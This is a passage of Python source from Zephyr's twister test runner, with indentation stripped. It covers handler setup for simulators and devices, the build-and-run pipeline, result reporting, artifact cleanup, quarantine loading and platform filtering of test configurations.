v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testsuite.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
# Here we check the runtime filter results coming from running cmake
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "filtered"
self.instance.reason = "runtime filter"
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped")
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
if self.instance.status == "skipped":
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped", self.instance.reason)
if res.get('returncode', 1) > 0:
self.instance.add_missing_testscases("blocked", self.instance.reason)
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.testplan = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed"]:
if instance.status == "error":
results.error += 1
else:
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testsuite.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status in ["skipped", "filtered"]:
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testsuite.testcases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for case in instance.testcases:
if case.status == 'skipped':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status in ["skipped", "filtered"]:
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.execution_time
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
if ( instance.status in ["error", "failed", "timeout", "flash_error"]
and hasattr(self.instance.handler, 'seed')
and self.instance.handler.seed is not None ):
more_info += "/seed: " + str(self.seed)
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do , instance.platform.name,
instance.testsuite.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testsuite.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.testplan = self.testplan
if(self.seed is not None and instance.platform.name.startswith("native_posix")):
self.parse_generated()
if('CONFIG_FAKE_ENTROPY_NATIVE_POSIX' in self.defconfig and
self.defconfig['CONFIG_FAKE_ENTROPY_NATIVE_POSIX'] == 'y'):
instance.handler.seed = self.seed
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.testplan.enable_size_report and not self.testplan.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.execution_time
class TestPlan(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
ts_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testsuite-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testsuite_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"testcases": {"type": "list", "default": []},
"platform_type": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}},
"seed": {"type": "int", "default": 0}
}
SAMPLE_FILENAME = 'sample.yaml'
TESTSUITE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testsuite_roots=[], outdir=None):
self.roots = testsuite_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Test Plan Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.detailed_skipped_report = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
self.seed = 0
# Keep track of which test cases we've filtered out and why
self.testsuites = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
self.timestamp = datetime.now().isoformat()
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testsuite.testcases)
if instance.status == 'filtered':
results.skipped_filter += 1
results.skipped_configs += 1
elif instance.status == 'passed':
results.passed += 1
results.done += 1
elif instance.status == 'error':
results.error += 1
results.done += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
jt = json.load(fp)
for ts in jt.get("testsuites", []):
d = {}
for m, _, _ in interesting_metrics:
d[m] = ts.get(m, 0)
ts_name = ts.get('name')
ts_platform = ts.get('platform')
saved_metrics[(ts_name, ts_platform)] = d
for instance in self.instances.values():
mkey = (instance.testsuite.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testsuite.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
# FIXME: need a better way to identify executed tests
handler_time = instance.metrics.get('handler_time', 0)
if float(handler_time) > 0:
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed + results.error,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
built_only = results.total - run - results.skipped_configs
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{built_only}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, platform_reports):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
json_file = filename + ".json"
self.json_report(json_file, version=self.version)
self.xunit_report(json_file, filename + ".xml", full_report=False)
self.xunit_report(json_file, filename + "_report.xml", full_report=True)
self.xunit_report_suites(json_file, filename + "_suite_report.xml")
if platform_reports:
self.target_report(json_file, outdir, suffix)
def target_report(self, json_file, outdir, suffix):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(json_file, filename, platform, full_report=True)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
testcases = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
testcases.append(case)
return testcases
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testsuites(self, testsuite_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTSUITE_FILENAME in filenames:
filename = self.TESTSUITE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
ts_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(ts_path, self.ts_schema)
parsed_data.load()
ts_path = os.path.dirname(ts_path)
workdir = os.path.relpath(ts_path, root)
for name in parsed_data.tests.keys():
ts = TestSuite(root, workdir, name)
ts_dict = parsed_data.get_test(name, self.testsuite_valid_keys)
ts.source_dir = ts_path
ts.yamlfile = ts_path
ts.type = ts_dict["type"]
ts.tags = ts_dict["tags"]
ts.extra_args = ts_dict["extra_args"]
ts.extra_configs = ts_dict["extra_configs"]
ts.arch_allow = ts_dict["arch_allow"]
ts.arch_exclude = ts_dict["arch_exclude"]
ts.skip = ts_dict["skip"]
ts.platform_exclude = ts_dict["platform_exclude"]
ts.platform_allow = ts_dict["platform_allow"]
ts.platform_type = ts_dict["platform_type"]
ts.toolchain_exclude = ts_dict["toolchain_exclude"]
ts.toolchain_allow = ts_dict["toolchain_allow"]
ts.ts_filter = ts_dict["filter"]
ts.timeout = ts_dict["timeout"]
ts.harness = ts_dict["harness"]
ts.harness_config = ts_dict["harness_config"]
if ts.harness == 'console' and not ts.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
ts.build_only = ts_dict["build_only"]
ts.build_on_all = ts_dict["build_on_all"]
ts.slow = ts_dict["slow"]
ts.min_ram = ts_dict["min_ram"]
ts.modules = ts_dict["modules"]
ts.depends_on = ts_dict["depends_on"]
ts.min_flash = ts_dict["min_flash"]
ts.extra_sections = ts_dict["extra_sections"]
ts.integration_platforms = ts_dict["integration_platforms"]
ts.seed = ts_dict["seed"]
testcases = ts_dict.get("testcases", [])
if testcases:
for tc in testcases:
ts.add_testcase(name=f"{name}.{tc}")
else:
ts.parse_subcases(ts_path)
if testsuite_filter:
if ts.name and ts.name in testsuite_filter:
self.testsuites[ts.name] = ts
else:
self.testsuites[ts.name] = ts
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (ts_path, e))
self.load_errors += 1
return len(self.testsuites)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
of all tests configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_platform=[]):
with open(file, "r") as json_test_plan:
jtp = json.load(json_test_plan)
instance_list = []
for ts in jtp.get("testsuites", []):
logger.debug(f"loading {ts['name']}...")
testsuite = ts["name"]
platform = self.get_platform(ts["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testsuites[testsuite], platform, self.outdir)
if ts.get("run_id"):
instance.run_id = ts.get("run_id")
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.metrics['handler_time'] = ts.get('execution_time', 0)
instance.metrics['ram_size'] = ts.get("ram_size", 0)
instance.metrics['rom_size'] = ts.get("rom_size",0)
status = ts.get('status', None)
reason = ts.get("reason", "Unknown")
if status in ["error", "failed"]:
instance.status = None
instance.reason = None
# test marked as passed (built only) but can run when
# --test-only is used. Reset status to capture new results.
elif status == 'passed' and instance.run and self.test_only:
instance.status = None
instance.reason = None
else:
instance.status = status
instance.reason = reason
for tc in ts.get('testcases', []):
identifier = tc['identifier']
tc_status = tc.get('status', None)
tc_reason = None
# we set reason only if status is valid, it might have been
# reset above...
if instance.status:
tc_reason = tc.get('reason')
if tc_status:
case = instance.set_case_status_by_name(identifier, tc_status, tc_reason)
case.duration = tc.get('execution_time', 0)
if tc.get('log'):
case.output = tc.get('log')
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testsuite_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, f"platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testsuite list...")
for ts_name, ts in self.testsuites.items():
if ts.build_on_all and not platform_filter:
platform_scope = self.platforms
elif ts.integration_platforms and self.integration:
self.verify_platforms_existence(
ts.integration_platforms, f"{ts_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in ts.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and ts.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if ts.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
ts.platform_allow, f"{ts_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in ts.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in ts.platform_allow, \
self.platforms))
# list of instances per testsuite, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(ts, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if ts.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (ts.type == "unit"):
# Discard silently
continue
if ts.modules and self.modules:
if not set(ts.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(ts.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and ts.integration_platforms and plat.name not in ts.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if ts.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not ts.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testsuite tag filter")
if exclude_tag and ts.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testsuite exclude filter")
if testsuite_filter and ts_name not in testsuite_filter:
discards[instance] = discards.get(instance, "TestSuite name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testsuite arch filter")
if not force_platform:
if ts.arch_allow and plat.arch not in ts.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if ts.arch_exclude and plat.arch in ts.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if ts.platform_exclude and plat.name in ts.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if ts.toolchain_exclude and toolchain in ts.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if ts.platform_allow and plat.name not in ts.platform_allow:
discards[instance] = discards.get(instance, "Not in testsuite platform allow list")
if ts.platform_type and plat.type not in ts.platform_type:
discards[instance] = discards.get(instance, "Not in testsuite platform type list")
if ts.toolchain_allow and toolchain not in ts.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testsuite toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and ts.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < ts.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if ts.depends_on:
dep_intersection = ts.depends_on.intersection(set(plat.supported))
if dep_intersection != set(ts.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < ts.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testsuite.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testsuite
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not ts.build_on_all and not integration:
if ts.platform_allow:
a = set(self.default_platforms)
b = set(ts.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda ts: ts.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda ts: ts.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in ts.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
